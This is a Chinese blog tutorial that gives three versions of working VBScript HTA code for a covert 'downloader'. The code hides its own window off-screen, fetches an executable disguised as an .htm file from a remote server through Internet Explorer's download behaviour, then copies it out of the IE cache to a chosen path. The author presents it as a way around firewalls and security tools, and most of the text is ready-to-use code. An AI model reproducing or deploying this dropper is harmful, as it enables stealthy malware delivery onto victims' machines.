做一个困难重重的hta下载者

一、先说本blog上有两个比较新颖的vbs下载者，一个是利用CDO.Message组件做的，另一个是用Microsoft.XMLDOM做的，参见http://www.jb51.net/article/15506.htm。这两个下载者一个是利用起来比较麻烦，需要事先把exe进行转化。第二使用中cscript.exe会访问网络，不太隐蔽。第二个是有的机器上并不存在这两个组件及利用到ADODB.Stream的，所以有些弊端。
二、再来说一下lake2的下载者http://blog.csdn.net/lake2/archive/2007/05/08/1600580.aspx。这个下载者算是不错了，但是也有问题。一个是如果装了360等其它的浏览器的话，会打开一个ie窗口，并且从注册表中读到的ie缓存位置不一定准确。
三、那我们如何来更新这些缺陷？还是有办法的。我们用hta来写，这个就比较少见了.hh.exe访问网络一般估计会放行的。写这个下载者要解决的困难有几下几点：

（1）.使hta不可见-------------》简单，移动窗口
（2）.使hta接收命令行参数--------------》本blog上有资料
（3）.不调用上边一、二大项所说的所有组件-----------》这个我们利用ie的默认行为
（4）.ie缓存的临时位置---------》我用的环境变量
(5)我们不调用任何组件-------------------》需要手动
四、代码（直接把参数写在hta里）


代码如下:

<script language=vbs>
window.moveTo 4000,4000
window.resizeTo 0,0 '使hta不可见
set objshell= Createobject("WScript.Shell")'hta是可以直接调用WScript.Shell的，不过不能调用wscript.Createobject("WScript.Shell")
downpath=objshell.ExpandEnvironmentStrings("%USERPROFILE%")&"\Local Settings" '根据环境变量得到下载的路径
set xml=document.createElement("xml")'建方xml元素调用ie的默认行为
xml.addBehavior("#default#DownLoad")
xml.async=0
xml.load("http://192.168.0.10/xx.htm")'请把exe改名放到空间上，用ftp软件上传的话，可能不行，直接放比较好
ShowAllFile(downpath)
Sub ShowAllFile(Path) '遍历查找，直接用lake2的代码
FindFileName="xx[1].htm" '这个也是你需要改的，如果上边是xx.htm，这里就是xx[1].htm
Set FSO = CreateObject("Scripting.FileSystemObject")
Set f = FSO.GetFolder(Path)
Set fc = f.SubFolders
For Each f1 in fc
If FSO.FileExists(path&"\"&f1.name&"\"&FindFileName) Then
FSO.CopyFile path&"\"&f1.name&"\"&FindFileName, "c:\111.exe" '保存到c:\111.exe，可根据需要改动
'document.write "[+]Download Success !"
End If
ShowAllFile path&"\"&f1.name
Next
Set FSO = Nothing

End Sub
window.close
</script>

用法是：把exe好比xx.exe改名放到空间上，然后命令行下或双击这个hta就可以了。
五、另一份代码（传命令行参数）
我个人觉得第四部份的代码比较好，修改一下用就可以了。如果调用命令行参数的话，我发现还是会出现hta小窗口，下载完后才关闭，所以这不太好。代码：


代码如下:

<HTA:APPLICATION
ID="MySampleHTA"
Caption="yes">
<script language=vbs>
on error resume Next
window.moveTo 4000,4000
window.resizeTo 0,0 '使hta不可见
cmdLineArray = Split(MySampleHTA.commandLine)'这是把命令中的参数变成数组
set objshell= Createobject("WScript.Shell")
downpath=objshell.ExpandEnvironmentStrings("%USERPROFILE%")&"\Local Settings" '根据环境变量得到下载的路径
temp=LastOne(cmdLineArray(UBound(cmdLineArray)),"/") '从命令行得到当前文件名
temp=split(temp,".")'根据.分割
FindFileName=temp(0)&"[1]."&temp(1)
LocalName=objshell.CurrentDirectory&"\"&temp(0)&".exe"
set xml=document.createElement("xml")
xml.addBehavior("#default#DownLoad")
xml.async=0
xml.load(cmdLineArray(UBound(cmdLineArray)))

ShowAllFile(downpath)
Sub ShowAllFile(Path)
Set FSO = CreateObject("Scripting.FileSystemObject")
Set f = FSO.GetFolder(Path)
Set fc = f.SubFolders
For Each f1 in fc
If FSO.FileExists(path&"\"&f1.name&"\"&FindFileName) Then
FSO.CopyFile path&"\"&f1.name&"\"&FindFileName, LocalName
'document.write "[+]Download Success !"
End If
ShowAllFile path&"\"&f1.name
Next
Set FSO = Nothing

End Sub
Function LastOne(Str,splitStr)
'输入字符和分隔符，得到最后一部分
LastOne = right(Str,len(Str)-InStrRev(Str,splitStr))
End Function
window.close
</script>

用法是：把exe好比xx.exe改名xx.htm放到空间上，然后命令行下好比"c:\xx.hta http://www.target.com/xx.htm"，这样xx.exe就会保存到c:
六、不调用任何组件（需手动查找下载的xx[1].htm）：


代码如下:

window.moveTo 4000,4000
window.resizeTo 0,0 '使hta不可见
set xml=document.createElement("xml")'建方xml元素调用ie的默认行为
xml.addBehavior("#default#DownLoad")
xml.async=0
xml.load("http://192.168.0.10/xx.htm")'
window.close

七、缺点
我这个hta下载者并不是完美的。第一是因为下载到的临时变量我用到了ExpandEnvironmentStrings("%USERPROFILE%")，这样在用户环境下可用，如果是system权限下可能不正常（我猜测的，并没有测试）。第二是因为下载成功后并没有提示，直接用hta在命令行下显示出回显有些麻烦，所以我没有做，嘿嘿。